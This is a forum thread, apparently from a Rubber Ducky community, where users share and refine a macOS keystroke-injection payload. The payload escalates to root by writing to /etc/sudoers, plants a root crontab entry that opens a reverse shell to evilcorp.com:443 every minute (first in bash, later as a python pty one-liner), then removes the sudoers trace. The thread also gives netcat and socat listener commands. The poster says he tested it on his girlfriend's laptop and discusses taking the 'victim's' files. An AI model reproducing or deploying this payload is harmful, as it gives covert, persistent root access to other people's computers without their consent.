Jump to content

[Payload] [Mac OS X] Simple persistent reverse bash


Matto
 Share

Recommended Posts

Hi! I'm new to the Rubber Ducky and to this community.

I've made a simple payload to create a reverse bash in an OS X target by using crontab.

I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session.

Anyway, this is my payload:

DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 300
STRING Terminal
DELAY 300
ENTER
DELAY 700
COMMAND n
DELAY 500
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 200
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab -
ENTER
DELAY 200
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 200
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
COMMAND Q

What this does is:

  1. Open the terminal
  2. Magically grant sudo privileges (many thanks to V3sth4cks153 for this)
  3. Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP)
  4. Remove the newly added privileges to the current user in /etc/sudoers
  5. Close the terminal app

The whole execution takes around 5 seconds.

So now, all we have to do in our attacking machine is:

sudo nc -l -p 443

We wait one minute (max) and we're in with root privileges :ph34r:

Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it.

Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want.

I just tested it on my girlfriend's Macbook Air and it works flawlessly.

One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this?

Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect.

Hope you like it!

Link to comment
Share on other sites

Hi! I'm new to the Rubber Ducky and to this community.

I've made a simple payload to create a reverse bash in an OS X target by using crontab.

I've seen some examples that use complicated generated plist files, and I'm not sure about what the advantage is over setting a cron to recover the session.

Anyway, this is my payload:

DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 300
STRING Terminal
DELAY 300
ENTER
DELAY 700
COMMAND n
DELAY 500
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 200
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l ; echo "* * * * * bash -i >& /dev/tcp/evilcorp.com/443 0>&1")| crontab -
ENTER
DELAY 200
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 200
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
COMMAND Q
What this does is:
  • Open the terminal
  • Magically grant sudo privileges (many thanks to V3sth4cks153 for this)
  • Add a line to the root crontab to execute the reverse bash script every minute (replace «evilcorp.com» with your host / IP)
  • Remove the newly added privileges to the current user in /etc/sudoers
  • Close the terminal app
The whole execution takes around 5 seconds.

So now, all we have to do in our attacking machine is:

sudo nc -l -p 443
We wait one minute (max) and we're in with root privileges :ph34r:

Since the script is in root's crontab, we will always have root privileges, and if we close the connection, we can always re-take it.

Another advantage is that by using port 443, the victim machine will not be blocked by any firewall. You can change the port to whatever you want.

I just tested it on my girlfriend's Macbook Air and it works flawlessly.

One thing that bothers me (remember, I'm new) is that some keys like the arrows don't work, so when I want to edit a file using vi, or something like that, I can't. Maybe you guys can point me to some solution to this?

Same happens when I want to get files from the victim using FTP or SCP. When it's supposed to ask for my password, the connection stops responding and I have to re-connect.

Hope you like it!

Hi ! That looks really good ! I think that maybe the scripts you saw use plists for hiding purposes ? But even using crontab I think is covert enough for the average Mac user not to notice it.

The problem you have may be caused by the encoding of your payload... I had some problems with language properties... For example, encoding a payload with the Swiss layout sometimes caused some special characters (<, >, and some other ones) to be swapped, but it never happened with the arrow keys. What keyboard layout are you using ?

Link to comment
Share on other sites

Thanks!

The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab.

Yes, this makes it difficult to find, specially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :)

Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky).

When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead).

Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write:

ftp myserver.com

And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.

Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection?

Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address...

I'm not sure if I'm making myself clear. I'm sorry, english is not my native language :)

Thanks!

Link to comment
Share on other sites

Thanks!

The code I saw uses the .plist files to start the connection on reboot and repeat the execution of the script each 60 seconds, but I just find it way easier to do with crontab.

Yes, this makes it difficult to find, specially because it adds the cron task to root's crontab, so even if the user takes a look at his own cron list, he will see nothing (unless he is root) :)

Regarding the arrows: The problem is not with the payload (it works as intended :). The problem is with netcat once it's connected and I gain control manually (no longer using the ducky).

When the victim makes the connection to my server, from my terminal I can't edit his files using VIM or nano since when I open any file, I can't use the arrows to move around (weird symbols appear instead).

Same happens when I want to «borrow» a file from the victim. When I try to connect via FTP from his machine to my server, I write:

ftp myserver.com
And instead of asking for the username / password, the terminal goes blank and does not respond anymore, as if the connection was lost.

Maybe it's a netcat limitation to send some output and special keys (as the arrows) through the connection?

Do you know any way around this? I know setting an SSH server in the victim would be the best solution, but then the port 22 should be open in his router and pointing to his IP address...

I'm not sure if I'm making myself clear. I'm sorry, english is not my native language :)

Thanks!

Oh ! I understand ! So it's not a question of being more discrete then...

For your problem with the arrow keys, I think it might be a NetCat issue, but I really don't know how to get around it...

Don't worry, you're making yourself perfectly clear. At least for me even if English is not my native language as well ! :)

Edited by V3sth4cks153
Link to comment
Share on other sites

Good news!!

I've searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected.

Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection.

This is the Ducky payload:

DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 200
STRING Terminal
DELAY 200
ENTER
DELAY 500
COMMAND n
DELAY 300
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 100
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab -
ENTER
DELAY 100
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 100
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
DELAY 100
COMMAND w
DELAY 100
COMMAND q

And in your server, to listen for the connection you have to run:

sudo socat `tty`,raw,echo=0 tcp-listen:443

NOTE: Mostly sure you don't have socat installed, but you can do it very easily via apt-get (if your server is Debian based Linux. I'm not sure if it's available in OS X via homebrew).

This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour than an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :)

To exit, just press «Ctrl + D».

Same as before, it will try to reconnect every 60 seconds.

I hope this helps. I've tested it an works like a charm.

Link to comment
Share on other sites

Good news!!

I've searching around and I found that «netcat does a terrible job emulating a tty», so as I stated before, arrows and key combinations don't work as expected.

Then I found a way better alternative to the payload that uses python to create the reverse shell and socat instead of netcat to listen for the connection.

This is the Ducky payload:

DELAY 2000
REM --------------- OPEN TERMINAL IN A NEW WINDOW ---------------
COMMAND SPACE
DELAY 200
STRING Terminal
DELAY 200
ENTER
DELAY 500
COMMAND n
DELAY 300
REM --------------- ESCALATE PRIVILEGES ---------------
STRING echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
ENTER
DELAY 100
REM --------------- RUN PAYLOAD ---------------
STRING (crontab -l; echo "* * * * * python -c \"import sys,socket,os,pty; _,ip,port=sys.argv; s=socket.socket(); s.connect((ip,int(port))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/bash')\" evilcorp.com 443") | crontab -
ENTER
DELAY 100
REM --------------- SET PRIVILEGES BACK TO NORMAL ---------------
STRING echo -e '$d\nw\nq'| ed /etc/sudoers
ENTER
DELAY 100
REM --------------- CLOSE TERMINAL ---------------
STRING exit
ENTER
DELAY 100
COMMAND w
DELAY 100
COMMAND q
And in your server, to listen for the connection you have to run:
sudo socat `tty`,raw,echo=0 tcp-listen:443
NOTE: Mostly sure you don't have socat installed, but you can do it very easily via apt-get (if your server is Debian based Linux. I'm not sure if it's available in OS X via homebrew).

This method has a longer command to execute and is not as «elegant» as the previous, but it solves ALL of the problems, and when I say all, I mean that even the autocomplete with the TAB key works perfectly. It's just the same behaviour than an SSH connection. You can also press «Ctrl + C» and you won't drop the connection, it's going to send that command to the victim as expected :)

To exit, just press «Ctrl + D».

Same as before, it will try to reconnect every 60 seconds.

I hope this helps. I've tested it an works like a charm.

That's so cool ! Really well done ! I'll test it first thing tomorrow !

Link to comment
Share on other sites

Nice! Let me know how it went :)

I tried the first payload, which uses the bash reverse shell, and it worked without any problem on my mac ! I'll try it on other macs tomorrow, and let you know how this goes...

However, when trying to use the second one, which uses python, I was blocked because it uses some backslashes... I tried modifying the keyboard properties, but as I just posted here: https://forums.hak5.org/index.php?/topic/36433-multiple-modifier-keys-in-keyboard-layout/, I can't get it to work... Do you know how to use more than one modifier key in the properties file ?

Edited by V3sth4cks153
Link to comment
Share on other sites

Oops, you got me there.

I managed to make a proper layout for my keyboard using other languages as reference, but it was all trial and error.

The backlash was one of the keys that was not working correctly, so I had to fix it.

I'm not sure if it will help, but these are the changes I made:

https://forums.hak5.org/index.php?/topic/36068-keyboard-layout-modified-spanish-keyboard-layout/

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...